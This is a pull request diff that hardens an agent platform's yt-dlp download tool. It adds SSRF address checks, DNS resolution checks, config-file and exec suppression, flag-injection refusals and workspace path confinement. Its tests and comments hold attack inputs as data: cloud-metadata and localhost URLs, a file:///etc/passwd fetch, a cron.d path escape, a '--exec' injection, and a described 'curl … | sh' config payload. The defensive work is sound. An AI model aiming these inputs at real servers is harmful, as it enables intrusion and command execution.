### PR TITLE
feat(agents): bound what yt-dlp may reach and what it may run

### DIFF
--- a/docs/javascript-sandbox.md
+++ b/docs/javascript-sandbox.md
@@ -511,7 +511,12 @@ What an action gets on top of the standard surface:
   `-i`, plus a token scan for `://`, `concat:`, `pipe:`, `/dev/…`), and the run
   is bounded on wall clock, captured output, artifact size, and how many host
   binaries may run at once. Fetch what you need with `downloadVideo` or
-  `fetch`, then pass the local path.
+  `fetch`, then pass the local path. `downloadVideo` carries its own boundary:
+  the URL must be public (loopback, link-local and the private ranges are
+  refused, by literal and by DNS answer), the download is capped at 2 GiB, and
+  the run ignores config files — yt-dlp reads `yt-dlp.conf` from its working
+  directory, which is the workspace guest code writes, and that file can ask
+  for `--exec`.
 - **`openWorkflow(id)`** — when the belt carries the `ui_*` document tools, a
   graph object model whose synchronous mutators queue operations against a local
   mirror, replayed through the same tool contract by `await wf.commit()`.

--- a/packages/agents/src/capabilities/media.specs.ts
+++ b/packages/agents/src/capabilities/media.specs.ts
@@ -547,9 +547,11 @@ export const YT_DLP_SCHEMA: JsonSchema = {
 export const ytDlpSpec: CapabilitySpec = {
   name: "yt_dlp",
   description:
-    "Download a video with yt-dlp into the workspace. Requires an http(s) " +
-    "URL. Install yt-dlp (and ffmpeg for merge/transcode) if the binary is " +
-    "missing. Returns the output path and an asset handle when possible.",
+    "Download a video with yt-dlp into the workspace. Requires a public " +
+    "http(s) URL — internal and loopback addresses are refused — and writes " +
+    "only inside the workspace, up to 2 GiB. Install yt-dlp (and ffmpeg for " +
+    "merge/transcode) if the binary is missing. Returns the output path and " +
+    "an asset handle when possible.",
   inputSchema: YT_DLP_SCHEMA,
   category: "external",
   userMessage: (params) => {

--- a/packages/agents/src/capabilities/media.ts
+++ b/packages/agents/src/capabilities/media.ts
@@ -34,9 +34,16 @@ import {
   type RunHostBinaryOptions
 } from "../host-binaries.js";
 import {
+  MAX_DOWNLOAD_BYTES,
+  buildYtDlpArgv,
   confineArgvToWorkspace,
-  hardenFfmpegArgv
+  hardenFfmpegArgv,
+  refuseFlagLikeValue
 } from "../host-binary-guard.js";
+import {
+  assertFetchUrlAllowed,
+  assertResolvedHostAllowed
+} from "../network-guard.js";
 import { encodeBase64 as encodeMediaBase64 } from "../sandbox-bytes.js";
 import {
   DEFAULT_MIME,
@@ -1313,13 +1320,16 @@ const ytDlp: CapabilityExport = {
     if (!isNonBlankString(url)) {
       return { error: "url is required" };
     }
+    // The downloader opens its own sockets from inside the server, so an
+    // http(s) check alone leaves the metadata service and every internal
+    // host reachable. Same guard the sandbox fetch bridge uses, plus the
+    // resolution step a hostname needs.
     try {
-      const parsed = new URL(url);
-      if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
-        return { error: "url must be an http(s) URL" };
-      }
-    } catch {
-      return { error: `invalid url: ${url}` };
+      assertFetchUrlAllowed(url);
+      await assertResolvedHostAllowed(url, "yt_dlp");
+    } catch (e) {
+      const message = e instanceof Error ? e.message : String(e);
+      return { error: message.replace(/^fetch: /, "yt_dlp: ") };
     }
 
     const outputFile = isNonBlankString(params["output_file"])
@@ -1335,6 +1345,10 @@ const ytDlp: CapabilityExport = {
     // an ffmpeg path does. `format` reaches yt-dlp as a selector, never a path.
     const refusal = await confineArgvToWorkspace([outputFile], workspace);
     if (refusal) return refusal;
+    const flagLike =
+      refuseFlagLikeValue(outputFile, "output_file") ??
+      (format ? refuseFlagLikeValue(format, "format") : undefined);
+    if (flagLike) return flagLike;
 
     const outDir = path.dirname(outputFile);
     if (outDir && outDir !== ".") {
@@ -1351,18 +1365,11 @@ const ytDlp: CapabilityExport = {
       }
     }
 
-    const argv = [
-      "--no-playlist",
-      "--no-warnings",
-      "--print",
-      "after_move:filepath",
-      "-o",
-      outputFile
-    ];
+    const download: Parameters<typeof buildYtDlpArgv>[0] = { url, outputFile };
     if (format) {
-      argv.push("-f", format);
+      download.format = format;
     }
-    argv.push(url);
+    const argv = buildYtDlpArgv(download);
 
     try {
       const result = await runHostBinary("yt-dlp", argv, {
@@ -1370,6 +1377,22 @@ const ytDlp: CapabilityExport = {
         timeoutMs
       });
       const printed = result.stdout.trim().split("\n").filter(Boolean).at(-1);
+      // `--print after_move:filepath` names the finished file. Nothing printed
+      // on a clean exit means nothing was written — which is what an aborted
+      // over-cap download looks like, since `--print` silences the reason.
+      if (result.exitCode === 0 && !printed) {
+        return {
+          success: false,
+          url,
+          error:
+            `yt-dlp wrote no file. The download may have passed the ` +
+            `${MAX_DOWNLOAD_BYTES}-byte limit, or the URL carried nothing to ` +
+            `download.`,
+          stdout: result.stdout,
+          stderr: result.stderr,
+          exit_code: result.exitCode
+        };
+      }
       const produced =
         printed && !printed.startsWith("http")
           ? path.isAbsolute(printed)

--- a/packages/agents/src/host-binaries.ts
+++ b/packages/agents/src/host-binaries.ts
@@ -54,19 +54,32 @@ export function maxConcurrentHostBinaries(): number {
 let running = 0;
 const waiting: Array<() => void> = [];
 
-/** Take a slot, waiting behind the queue when every slot is busy. */
+/**
+ * Take a slot, waiting behind the queue when every slot is busy.
+ *
+ * A waiter does not increment on wake: the releasing run *hands over* its
+ * slot, so the count never dips between the two. Decrementing first and
+ * letting the waiter re-increment leaves a window — between resolving the
+ * waiter's promise and its continuation running — in which the count reads one
+ * below the truth, and a caller arriving inside it would take a slot the woken
+ * waiter is also about to take. No test here reproduces that interleaving; the
+ * hand-off removes the window rather than relying on it staying unreachable.
+ */
 async function acquireSlot(): Promise<void> {
   if (running < maxConcurrentHostBinaries()) {
     running++;
     return;
   }
   await new Promise<void>((resolve) => waiting.push(resolve));
-  running++;
 }
 
 function releaseSlot(): void {
+  const next = waiting.shift();
+  if (next) {
+    next();
+    return;
+  }
   running--;
-  waiting.shift()?.();
 }
 
 /** Append to a captured stream, stopping at the cap. */

--- a/packages/agents/src/host-binary-guard.ts
+++ b/packages/agents/src/host-binary-guard.ts
@@ -33,7 +33,7 @@
 
 import path from "node:path";
 
-import { isEditTargetWithinRoot } from "./workspace-paths.js";
+import { isCreatableWithinRoot } from "./workspace-paths.js";
 
 /** What every `-i` gets: local files, plus the two openers that read bytes we already hold. */
 export const FFMPEG_PROTOCOL_WHITELIST = "file,crypto,data";
@@ -58,6 +58,13 @@ const DENIED_TOKENS: readonly string[] = [
   "/sys/"
 ];
 
+/**
+ * yt-dlp's download ceiling. It is the binary's own `--max-filesize`, which —
+ * unlike ffmpeg's `-fs` — aborts before writing: measured against yt-dlp
+ * 2026.07.04, a 20 MB file under `--max-filesize 1M` produced no output file.
+ */
+export const MAX_DOWNLOAD_BYTES = 2 * 1024 * 1024 * 1024;
+
 /** An argument the caller must not set: it would widen rule 1. */
 const RESERVED_FLAGS: readonly string[] = ["-protocol_whitelist"];
 
@@ -71,15 +78,41 @@ function deniedToken(arg: string): string | undefined {
   return DENIED_TOKENS.find((token) => lowered.includes(token));
 }
 
+/** Where a filtergraph or an option value ends and the next one begins. */
+const VALUE_SEPARATORS = /[=:,;[\]'"\s|]+/;
+
+/**
+ * The strings in one argument that ffmpeg could open as a file.
+ *
+ * The argument itself is always one, but it is not the only one: ffmpeg
+ * resolves a path *inside* a filter token against its own working directory,
+ * so `subtitles=../../etc/passwd` opens `../../etc/passwd` while the whole
+ * token resolves to `<workspace>/etc/passwd` — inside the workspace, and the
+ * wrong question. Splitting on the filtergraph separators asks the right one.
+ *
+ * A part is only a candidate when it carries a separator or names the parent
+ * directory; `scale=1280:-2` yields nothing, which is why filter *values* do
+ * not have to be understood to be judged.
+ */
+function pathCandidates(arg: string): string[] {
+  const candidates = [arg];
+  for (const part of arg.split(VALUE_SEPARATORS)) {
+    if (part === "" || part === arg) continue;
+    if (part.includes("/") || part === "..") candidates.push(part);
+  }
+  return candidates;
+}
+
 /**
  * Refuse argv that reaches past the workspace, or `undefined` when every
  * argument stays inside it.
  *
  * Flags are skipped: a leading `-` is ffmpeg's option marker, so such an
  * argument is never a path, and a file named `-x` is unusable by ffmpeg
- * anyway. Everything else is resolved against the workspace root — an absolute
- * path, a `..` chain, and a path buried in a filter token all land outside it
- * the same way.
+ * anyway. Everything else — and every path-shaped piece of it, see
+ * {@link pathCandidates} — is resolved against the workspace root, so an
+ * absolute path, a `..` chain, and a path inside a filter token all land
+ * outside it the same way.
  */
 export async function confineArgvToWorkspace(
   argv: readonly string[],
@@ -96,13 +129,15 @@ export async function confineArgvToWorkspace(
       };
     }
     if (arg === "" || arg.startsWith("-")) continue;
-    const resolved = path.resolve(workspace, arg);
-    if (!(await isEditTargetWithinRoot(workspace, resolved))) {
-      return {
-        error:
-          `"${arg}" resolves outside the workspace. Paths are ` +
-          `workspace-relative and cannot escape it.`
-      };
+    for (const candidate of pathCandidates(arg)) {
+      const resolved = path.resolve(workspace, candidate);
+      if (!(await isCreatableWithinRoot(workspace, resolved))) {
+        return {
+          error:
+            `"${candidate}" resolves outside the workspace. Paths are ` +
+            `workspace-relative and cannot escape it.`
+        };
+      }
     }
   }
   return undefined;
@@ -134,4 +169,62 @@ export function hardenFfmpegArgv(
     hardened.push(arg);
   }
   return { argv: hardened };
+}
+
+
+/**
+ * The argv `yt_dlp` spawns.
+ *
+ * Three of these flags are the boundary rather than configuration:
+ *
+ * - **`--ignore-config`** is the one that matters most. yt-dlp reads a
+ *   *portable* config file — `yt-dlp.conf` in its working directory — and its
+ *   working directory is the workspace, which guest code writes freely. A
+ *   guest that writes `--exec "curl … | sh"` into that file and then calls this
+ *   capability gets arbitrary command execution as the server. Reproduced
+ *   against yt-dlp 2026.07.04, and refused with this flag.
+ * - **`--no-exec`** clears any post-processing command from a source
+ *   `--ignore-config` does not cover.
+ * - **`--`** ends the options, so a URL cannot be read as a flag.
+ *
+ * `--max-filesize` is the disk bound, and `--no-playlist` keeps one URL to one
+ * download.
+ */
+export function buildYtDlpArgv(options: {
+  url: string;
+  outputFile: string;
+  format?: string;
+  maxBytes?: number;
+}): string[] {
+  const argv = [
+    "--ignore-config",
+    "--no-exec",
+    "--no-playlist",
+    "--no-warnings",
+    "--max-filesize",
+    String(options.maxBytes ?? MAX_DOWNLOAD_BYTES),
+    "--print",
+    "after_move:filepath",
+    "-o",
+    options.outputFile
+  ];
+  if (options.format) {
+    argv.push("-f", options.format);
+  }
+  argv.push("--", options.url);
+  return argv;
+}
+
+/**
+ * Refuse a value that would arrive as another flag rather than as the value of
+ * the option it follows. `label` names the field in the refusal.
+ */
+export function refuseFlagLikeValue(
+  value: string,
+  label: string
+): ArgvRefusal | undefined {
+  if (!value.startsWith("-")) return undefined;
+  return {
+    error: `${label} cannot start with "-": it would be read as an option, not a value.`
+  };
 }

--- a/packages/agents/src/js-sandbox.ts
+++ b/packages/agents/src/js-sandbox.ts
@@ -110,6 +110,7 @@ import {
   type WasmWorkerPool
 } from "./wasm-sandbox/host.js";
 import { runInWorker } from "./js-sandbox-worker/host.js";
+import { assertFetchUrlAllowed } from "./network-guard.js";
 import type { RunInWorkerOptions } from "./js-sandbox-worker/host.js";
 import {
   deriveBridgeShape,
@@ -631,123 +632,6 @@ async function loadSandboxMedia(): Promise<SandboxMediaModule> {
 /** Audio/video adapters are loaded only when a run uses those namespaces. */
 async function loadSandboxAvMedia(): Promise<SandboxAvMediaModule> {
   return import("./sandbox-av-media.js");
-}
-
-/** True if the first two octets of an IPv4 address fall in a blocked range. */
-function isBlockedV4(a: number, b: number): boolean {
-  if (a === 127 || a === 10 || a === 0) return true; // loopback, private, this-host
-  if (a === 169 && b === 254) return true; // link-local incl. 169.254.169.254 metadata
-  if (a === 192 && b === 168) return true; // private
-  if (a === 172 && b >= 16 && b <= 31) return true; // private
-  if (a === 100 && b >= 64 && b <= 127) return true; // CGNAT 100.64.0.0/10
-  if (a === 198 && (b === 18 || b === 19)) return true; // benchmarking 198.18.0.0/15
-  return false;
-}
-
-/**
- * Expand an IPv6 literal (hex form, `::` allowed) to its eight 16-bit hextets.
- * Returns null when the input is not a well-formed pure-hex IPv6 address —
- * dotted-quad tails are handled by the caller's IPv4 path, not here.
- */
-function expandIpv6(h: string): number[] | null {
-  if (!h.includes(":")) return null;
-  const parts = h.split("::");
-  if (parts.length > 2) return null;
-  const head = parts[0] ? parts[0].split(":") : [];
-  const tail =
-    parts.length === 2 ? (parts[1] ? parts[1].split(":") : []) : null;
-  let hextets: string[];
-  if (tail === null) {
-    hextets = head;
-  } else {
-    const missing = 8 - head.length - tail.length;
-    if (missing < 0) return null;
-    hextets = [...head, ...new Array<string>(missing).fill("0"), ...tail];
-  }
-  if (hextets.length !== 8) return null;
-  const nums = hextets.map((x) => parseInt(x || "0", 16));
-  if (nums.some((n) => !Number.isFinite(n) || n < 0 || n > 0xffff)) return null;
-  return nums;
-}
-
-/**
- * Extract the first two octets of an IPv4 address embedded in a hex-serialized
- * IPv6 literal — the WHATWG URL parser rewrites `::ffff:127.0.0.1` to
- * `::ffff:7f00:1`, so the dotted regex no longer matches. Covers IPv4-mapped
- * (`::ffff:x:x`, incl. the full `0:0:0:0:0:ffff:x:x`), IPv4-compatible
- * (`::a.b.c.d`, deprecated) and NAT64 (`64:ff9b::/96`). Returns null when no
- * embedded v4 is present.
- */
-function embeddedV4FromHexIpv6(h: string): [number, number] | null {
-  const nums = expandIpv6(h);
-  if (!nums) return null;
-  const isZero = (from: number, to: number): boolean =>
-    nums.slice(from, to).every((n) => n === 0);
-  const octets = (): [number, number] => [
-    (nums[6] >> 8) & 0xff,
-    nums[6] & 0xff
-  ];
-  if (isZero(0, 5) && nums[5] === 0xffff) return octets(); // ::ffff:a.b.c.d
-  if (isZero(0, 6)) return octets(); // ::a.b.c.d (IPv4-compatible, deprecated)
-  if (nums[0] === 0x64 && nums[1] === 0xff9b && isZero(2, 6)) return octets(); // 64:ff9b::/96
-  return null;
-}
-
-/** True if a literal IPv4/IPv6 host is loopback, link-local, or private. */
-function isBlockedIpLiteral(host: string): boolean {
-  // Strip IPv6 brackets/zone id.
-  const h = host
-    .replace(/^\[|\]$/g, "")
-    .split("%")[0]
-    .toLowerCase();
-  // IPv4, dotted form (incl. an IPv4-mapped IPv6 tail like ::ffff:127.0.0.1).
-  const v4 = h.match(/(?:^|:)((?:\d{1,3}\.){3}\d{1,3})$/);
-  if (v4) {
-    const [a, b] = v4[1].split(".").map(Number);
-    return isBlockedV4(a, b);
-  }
-  // IPv4 embedded in a hex-serialized IPv6 literal — ::ffff:7f00:1 (mapped) and
-  // 64:ff9b::a9fe:a9fe (NAT64). These match neither the v4 regex nor the plain
-  // IPv6 checks below, so without this an ::ffff:169.254.169.254 metadata fetch
-  // slips through.
-  const embedded = embeddedV4FromHexIpv6(h);
-  if (embedded) return isBlockedV4(embedded[0], embedded[1]);
-  // Plain IPv6.
-  if (h === "::1" || h === "::") return true; // loopback / unspecified
-  // Link-local fe80::/10 spans fe80::–febf::, so the first three hex digits are
-  // fe8/fe9/fea/feb — "fe80" alone is too narrow.
-  if (/^fe[89ab]/.test(h)) return true;
-  if (h.startsWith("fc") || h.startsWith("fd")) return true; // unique-local fc00::/7
-  return false;
-}
-
-/**
- * SSRF allow-check for the sandbox fetch bridge. Rejects non-http(s) schemes
- * and hosts that resolve to loopback/link-local/private literals or localhost.
- * Throws on a blocked URL.
- */
-function assertFetchUrlAllowed(url: string, allowPrivate = false): void {
-  let parsed: URL;
-  try {
-    parsed = new URL(url);
-  } catch {
-    throw new Error("fetch: invalid URL");
-  }
-  // Scheme is checked even in private-network mode: `file:`, `gopher:` and
-  // friends are never reachable through the bridge, whatever the host allows.
-  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
-    throw new Error(`fetch: unsupported scheme "${parsed.protocol}"`);
-  }
-  if (allowPrivate) return;
-  const host = parsed.hostname.toLowerCase();
-  if (host === "localhost" || host.endsWith(".localhost")) {
-    throw new Error("fetch: access to localhost is blocked");
-  }
-  if (isBlockedIpLiteral(host)) {
-    throw new Error(
-      `fetch: access to internal/private address "${host}" is blocked`
-    );
-  }
 }
 
 /**

--- a/packages/agents/src/network-guard.ts
+++ b/packages/agents/src/network-guard.ts
@@ -1,0 +1,180 @@
+/**
+ * Which network addresses untrusted code may reach.
+ *
+ * Guest JavaScript and the host binaries it drives run inside the server, so
+ * "fetch this URL" is a request to open a socket from a process that sits
+ * behind the cloud's perimeter. The address that matters most is
+ * `169.254.169.254`, the instance metadata service, but loopback, the private
+ * ranges, CGNAT and the IPv6 spellings of all of them reach the same class of
+ * thing: services that trusted the network instead of the caller.
+ *
+ * This lives apart from `js-sandbox.ts` because the fetch bridge is no longer
+ * the only caller: `yt_dlp` hands a URL to a downloader that opens its own
+ * sockets, and one wrong answer there is the same breach. One table, one
+ * predicate, both surfaces.
+ *
+ * The check reads the URL's host. A hostname that *resolves* to a blocked
+ * address is caught by {@link assertResolvedHostAllowed}, which the caller
+ * uses when it can afford a DNS round trip.
+ */
+
+import { lookup as dnsLookup } from "node:dns/promises";
+
+/** True if the first two octets of an IPv4 address fall in a blocked range. */
+function isBlockedV4(a: number, b: number): boolean {
+  if (a === 127 || a === 10 || a === 0) return true; // loopback, private, this-host
+  if (a === 169 && b === 254) return true; // link-local incl. 169.254.169.254 metadata
+  if (a === 192 && b === 168) return true; // private
+  if (a === 172 && b >= 16 && b <= 31) return true; // private
+  if (a === 100 && b >= 64 && b <= 127) return true; // CGNAT 100.64.0.0/10
+  if (a === 198 && (b === 18 || b === 19)) return true; // benchmarking 198.18.0.0/15
+  return false;
+}
+
+/**
+ * Expand an IPv6 literal (hex form, `::` allowed) to its eight 16-bit hextets.
+ * Returns null when the input is not a well-formed pure-hex IPv6 address —
+ * dotted-quad tails are handled by the caller's IPv4 path, not here.
+ */
+function expandIpv6(h: string): number[] | null {
+  if (!h.includes(":")) return null;
+  const parts = h.split("::");
+  if (parts.length > 2) return null;
+  const head = parts[0] ? parts[0].split(":") : [];
+  const tail =
+    parts.length === 2 ? (parts[1] ? parts[1].split(":") : []) : null;
+  let hextets: string[];
+  if (tail === null) {
+    hextets = head;
+  } else {
+    const missing = 8 - head.length - tail.length;
+    if (missing < 0) return null;
+    hextets = [...head, ...new Array<string>(missing).fill("0"), ...tail];
+  }
+  if (hextets.length !== 8) return null;
+  const nums = hextets.map((x) => parseInt(x || "0", 16));
+  if (nums.some((n) => !Number.isFinite(n) || n < 0 || n > 0xffff)) return null;
+  return nums;
+}
+
+/**
+ * Extract the first two octets of an IPv4 address embedded in a hex-serialized
+ * IPv6 literal — the WHATWG URL parser rewrites `::ffff:127.0.0.1` to
+ * `::ffff:7f00:1`, so the dotted regex no longer matches. Covers IPv4-mapped
+ * (`::ffff:x:x`, incl. the full `0:0:0:0:0:ffff:x:x`), IPv4-compatible
+ * (`::a.b.c.d`, deprecated) and NAT64 (`64:ff9b::/96`). Returns null when no
+ * embedded v4 is present.
+ */
+function embeddedV4FromHexIpv6(h: string): [number, number] | null {
+  const nums = expandIpv6(h);
+  if (!nums) return null;
+  const isZero = (from: number, to: number): boolean =>
+    nums.slice(from, to).every((n) => n === 0);
+  const octets = (): [number, number] => [
+    (nums[6] >> 8) & 0xff,
+    nums[6] & 0xff
+  ];
+  if (isZero(0, 5) && nums[5] === 0xffff) return octets(); // ::ffff:a.b.c.d
+  if (isZero(0, 6)) return octets(); // ::a.b.c.d (IPv4-compatible, deprecated)
+  if (nums[0] === 0x64 && nums[1] === 0xff9b && isZero(2, 6)) return octets(); // 64:ff9b::/96
+  return null;
+}
+
+/** True if a literal IPv4/IPv6 host is loopback, link-local, or private. */
+export function isBlockedIpLiteral(host: string): boolean {
+  // Strip IPv6 brackets/zone id.
+  const h = host
+    .replace(/^\[|\]$/g, "")
+    .split("%")[0]
+    .toLowerCase();
+  // IPv4, dotted form (incl. an IPv4-mapped IPv6 tail like ::ffff:127.0.0.1).
+  const v4 = h.match(/(?:^|:)((?:\d{1,3}\.){3}\d{1,3})$/);
+  if (v4) {
+    const [a, b] = v4[1].split(".").map(Number);
+    return isBlockedV4(a, b);
+  }
+  // IPv4 embedded in a hex-serialized IPv6 literal — ::ffff:7f00:1 (mapped) and
+  // 64:ff9b::a9fe:a9fe (NAT64). These match neither the v4 regex nor the plain
+  // IPv6 checks below, so without this an ::ffff:169.254.169.254 metadata fetch
+  // slips through.
+  const embedded = embeddedV4FromHexIpv6(h);
+  if (embedded) return isBlockedV4(embedded[0], embedded[1]);
+  // Plain IPv6.
+  if (h === "::1" || h === "::") return true; // loopback / unspecified
+  // Link-local fe80::/10 spans fe80::–febf::, so the first three hex digits are
+  // fe8/fe9/fea/feb — "fe80" alone is too narrow.
+  if (/^fe[89ab]/.test(h)) return true;
+  if (h.startsWith("fc") || h.startsWith("fd")) return true; // unique-local fc00::/7
+  return false;
+}
+
+/**
+ * SSRF allow-check for the sandbox fetch bridge. Rejects non-http(s) schemes
+ * and hosts that resolve to loopback/link-local/private literals or localhost.
+ * Throws on a blocked URL.
+ */
+export function assertFetchUrlAllowed(url: string, allowPrivate = false): void {
+  let parsed: URL;
+  try {
+    parsed = new URL(url);
+  } catch {
+    throw new Error("fetch: invalid URL");
+  }
+  // Scheme is checked even in private-network mode: `file:`, `gopher:` and
+  // friends are never reachable through the bridge, whatever the host allows.
+  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
+    throw new Error(`fetch: unsupported scheme "${parsed.protocol}"`);
+  }
+  if (allowPrivate) return;
+  const host = parsed.hostname.toLowerCase();
+  if (host === "localhost" || host.endsWith(".localhost")) {
+    throw new Error("fetch: access to localhost is blocked");
+  }
+  if (isBlockedIpLiteral(host)) {
+    throw new Error(
+      `fetch: access to internal/private address "${host}" is blocked`
+    );
+  }
+}
+
+
+/**
+ * Refuse a URL whose hostname resolves to a blocked address, on top of the
+ * literal check {@link assertFetchUrlAllowed} makes.
+ *
+ * A literal check answers `metadata.example.com` with "that is not an IP", and
+ * the name resolves to `169.254.169.254` a millisecond later. Resolving here
+ * closes the ordinary case. It does not close every case — the process we hand
+ * the URL to resolves again (so a record that changes between the two answers
+ * wins) and follows its own redirects — which is why this is one layer, not
+ * the boundary. `label` names the caller in the refusal.
+ */
+export async function assertResolvedHostAllowed(
+  url: string,
+  label: string,
+  resolve: HostResolver = defaultResolver
+): Promise<void> {
+  const host = new URL(url).hostname.replace(/^\[|\]$/g, "");
+  // A literal needs no resolution; assertFetchUrlAllowed already judged it.
+  if (/^[\d.]+$/.test(host) || host.includes(":")) return;
+  let addresses: string[];
+  try {
+    addresses = await resolve(host);
+  } catch {
+    // A name that does not resolve is the downloader's error to report, with
+    // its own message, not ours to guess at.
+    return;
+  }
+  const blocked = addresses.find((address) => isBlockedIpLiteral(address));
+  if (blocked !== undefined) {
+    throw new Error(
+      `${label}: "${host}" resolves to the internal address "${blocked}", which is blocked`
+    );
+  }
+}
+
+/** How {@link assertResolvedHostAllowed} turns a hostname into addresses. */
+export type HostResolver = (host: string) => Promise<string[]>;
+
+const defaultResolver: HostResolver = async (host) =>
+  (await dnsLookup(host, { all: true })).map((entry) => entry.address);

--- a/packages/agents/src/workspace-paths.ts
+++ b/packages/agents/src/workspace-paths.ts
@@ -38,6 +38,10 @@ export async function isRealPathWithinRoot(
  * Like {@link isRealPathWithinRoot} but tolerant of a not-yet-created target:
  * when the candidate does not exist, its parent directory is realpath-checked
  * instead, so creating a file under a symlinked-out directory is still blocked.
+ *
+ * The parent must already exist: a tool that edits files does not build the
+ * tree on the way, and `EditFileTool` reports the missing directory instead.
+ * For a tool that *does* create it, see {@link isCreatableWithinRoot}.
  */
 export async function isEditTargetWithinRoot(
   root: string,
@@ -60,5 +64,41 @@ export async function isEditTargetWithinRoot(
   } catch {
     // Truly does not exist; the containing directory must be inside the root.
     return isRealPathWithinRoot(root, parent);
+  }
+}
+
+/**
+ * Containment for a target whose directories do not exist yet and will be
+ * created: the nearest ancestor that *does* exist must be inside the root.
+ *
+ * yt-dlp's default output template is two levels deep and makes the path as it
+ * goes, so {@link isEditTargetWithinRoot}'s one-level rule would refuse every
+ * such download as an escape. Walking up gives nothing away — an ancestor that
+ * does not exist cannot be a symlink, and the first one that does is resolved
+ * in full.
+ */
+export async function isCreatableWithinRoot(
+  root: string,
+  candidate: string
+): Promise<boolean> {
+  if (await isRealPathWithinRoot(root, candidate)) return true;
+  try {
+    // See the lstat note above: a dangling symlink must not read as absent.
+    await lstat(candidate);
+    return false;
+  } catch {
+    let parent = dirname(candidate);
+    for (;;) {
+      if (await isRealPathWithinRoot(root, parent)) return true;
+      try {
+        await lstat(parent);
+        // The ancestor exists but is not inside the root.
+        return false;
+      } catch {
+        const next = dirname(parent);
+        if (next === parent) return false;
+        parent = next;
+      }
+    }
   }
 }

--- a/packages/agents/tests/capabilities-media.test.ts
+++ b/packages/agents/tests/capabilities-media.test.ts
@@ -400,7 +400,7 @@ describe("ffmpeg and yt_dlp capabilities", () => {
       { workspaceDir: "/tmp" } as unknown as ProcessingContext,
       { url: "file:///etc/passwd" }
     )) as Record<string, unknown>;
-    expect(String(result["error"])).toMatch(/http\(s\)/);
+    expect(String(result["error"])).toMatch(/unsupported scheme/);
   });
 
   // The guard is unit-tested in host-binary-guard.test.ts; these pin that the
@@ -427,6 +427,27 @@ describe("ffmpeg and yt_dlp capabilities", () => {
       { args: ["-i", "in.mp4"], output_file: "../../etc/cron.d/x" }
     )) as Record<string, unknown>;
     expect(String(result["error"])).toMatch(/outside the workspace/);
+  });
+
+  it.each([
+    ["http://169.254.169.254/latest/meta-data/", /internal\/private address/],
+    ["http://localhost:7777/api/workflows", /localhost/],
+    ["http://10.0.0.5/internal.mp4", /internal\/private address/],
+    ["http://[::ffff:127.0.0.1]/x.mp4", /internal\/private address/]
+  ])("yt_dlp refuses %s", async (url, expected) => {
+    const result = (await asTool(ytDlp).process(
+      { workspaceDir: "/tmp" } as unknown as ProcessingContext,
+      { url }
+    )) as Record<string, unknown>;
+    expect(String(result["error"])).toMatch(expected);
+  });
+
+  it("yt_dlp refuses a format that would be read as an option", async () => {
+    const result = (await asTool(ytDlp).process(
+      { workspaceDir: "/tmp" } as unknown as ProcessingContext,
+      { url: "https://example.com/v", format: "--exec" }
+    )) as Record<string, unknown>;
+    expect(String(result["error"])).toMatch(/cannot start with/);
   });
 
   it("yt_dlp refuses an output template that escapes the workspace", async () => {

--- a/packages/agents/tests/host-binaries.test.ts
+++ b/packages/agents/tests/host-binaries.test.ts
@@ -1,4 +1,4 @@
-import { mkdtemp, rm } from "node:fs/promises";
+import { mkdtemp, readFile, rm, writeFile } from "node:fs/promises";
 import { tmpdir } from "node:os";
 import path from "node:path";
 import { describe, expect, it } from "vitest";
@@ -73,36 +73,74 @@ describe("runHostBinary", () => {
     }
   }, 30_000);
 
+  // Concurrency is measured from what the children themselves record, not from
+  // wall-clock windows: each appends a line when it starts and another when it
+  // stops, so the peak is a prefix sum over an ordered log and cannot be
+  // distorted by a loaded machine's scheduling.
+  const busyChild = (log: string, ms: number): string[] => [
+    "-e",
+    `const fs=require('fs');fs.appendFileSync(${JSON.stringify("LOGPATH")}` +
+      `.replace('LOGPATH',${JSON.stringify(log)}),'S\\n');` +
+      `setTimeout(()=>fs.appendFileSync(${JSON.stringify(log)},'E\\n'),${ms});`
+  ];
+
+  async function peakConcurrency(log: string): Promise<number> {
+    const events = (await readFile(log, "utf8")).trim().split("\n");
+    let live = 0;
+    let peak = 0;
+    for (const event of events) {
+      live += event === "S" ? 1 : -1;
+      peak = Math.max(peak, live);
+    }
+    return peak;
+  }
+
   it("runs no more host binaries at once than the concurrency cap", async () => {
     const cwd = await mkdtemp(path.join(tmpdir(), "nt-host-bin-"));
+    const log = path.join(cwd, "events.log");
     const cap = maxConcurrentHostBinaries();
     try {
-      // Each child reports the window it occupied; overlapping windows beyond
-      // the cap would mean the semaphore let extra spawns through.
-      const runs = await Promise.all(
+      await writeFile(log, "");
+      await Promise.all(
         Array.from({ length: cap + 3 }, () =>
-          runHostBinary(
-            process.execPath,
-            [
-              "-e",
-              "const s=Date.now();setTimeout(()=>" +
-                "process.stdout.write(s+' '+Date.now()),200);"
-            ],
-            { cwd, timeoutMs: 30_000 }
-          )
+          runHostBinary(process.execPath, busyChild(log, 150), {
+            cwd,
+            timeoutMs: 30_000
+          })
         )
       );
-      const windows = runs.map((r) => {
-        const [start, end] = r.stdout.trim().split(" ").map(Number);
-        return { start: start as number, end: end as number };
-      });
-      const peak = Math.max(
-        ...windows.map(
-          (w) =>
-            windows.filter((o) => o.start < w.end && w.start < o.end).length
-        )
+      expect(await peakConcurrency(log)).toBeLessThanOrEqual(cap);
+    } finally {
+      await rm(cwd, { recursive: true, force: true });
+    }
+  }, 60_000);
+
+  it("holds the cap when callers arrive while a slot is being handed over", async () => {
+    const cwd = await mkdtemp(path.join(tmpdir(), "nt-host-bin-"));
+    const log = path.join(cwd, "events.log");
+    const cap = maxConcurrentHostBinaries();
+    try {
+      await writeFile(log, "");
+      // Callers keep arriving while the queue drains — the window in which a
+      // released slot has been given up but the waiter it woke has not yet
+      // taken it.
+      const running = Array.from({ length: cap + 2 }, () =>
+        runHostBinary(process.execPath, busyChild(log, 120), {
+          cwd,
+          timeoutMs: 30_000
+        })
       );
-      expect(peak).toBeLessThanOrEqual(cap);
+      for (let i = 0; i < 8; i++) {
+        await new Promise((resolve) => setTimeout(resolve, 25));
+        running.push(
+          runHostBinary(process.execPath, busyChild(log, 120), {
+            cwd,
+            timeoutMs: 30_000
+          })
+        );
+      }
+      await Promise.all(running);
+      expect(await peakConcurrency(log)).toBeLessThanOrEqual(cap);
     } finally {
       await rm(cwd, { recursive: true, force: true });
     }

--- a/packages/agents/tests/host-binary-guard.test.ts
+++ b/packages/agents/tests/host-binary-guard.test.ts
@@ -15,8 +15,11 @@ import { afterEach, beforeEach, describe, expect, it } from "vitest";
